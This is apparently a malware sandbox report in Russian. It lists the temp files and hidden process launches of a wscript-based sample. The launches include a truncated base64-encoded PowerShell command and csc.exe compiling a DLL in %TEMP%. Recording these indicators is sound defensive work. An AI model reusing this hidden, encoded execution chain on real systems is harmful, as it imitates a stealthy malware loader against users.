Техническая информация
- %TEMP%\content\2136-4372-wscript.exe-14-33-32-481.dump
- %TEMP%\jdi4sr0g\jdi4sr0g.0.cs
- %TEMP%\jdi4sr0g\jdi4sr0g.cmdline
- %TEMP%\jdi4sr0g\jdi4sr0g.out
- %TEMP%\jdi4sr0g\csc2361ba7287fa40caba429bc71210a1d.tmp
- %TEMP%\res2db7.tmp
- %TEMP%\jdi4sr0g\jdi4sr0g.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBGAHIAaQBrACAAUAByAGEAdwBuAGUAcgBzAHMAYQAxACAAVAByAGkAZgBvAGwAaQA2ACAARwBBAFMARQBPACAASQBuAGQAaQAxACAAcwB0AGEAYQBsAHYAcgBrACAAQQBuAHMAawBhADcAIABGAHIAYQBrAGUAbgBkAGUAIABQAEUA...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\jdi4sr0g\jdi4sr0g.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2DB7.tmp" "%TEMP%\jdi4sr0g\CSC2361BA7287FA40CABA429BC71210A1D.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBGAHIAaQBrACAAUAByAGEAdwBuAGUAcgBzAHMAYQAxACAAVAByAGkAZgBvAGwAaQA2ACAARwBBAFMARQBPACAASQBuAGQAaQAxACAAcwB0AGEAYQBsAHYAcgBrACAAQQBuAHMAawBhADcAIABGAHIAYQBrAGUAbgBkAGUAIABQAEUA...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\jdi4sr0g\jdi4sr0g.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2DB7.tmp" "%TEMP%\jdi4sr0g\CSC2361BA7287FA40CABA429BC71210A1D.TMP"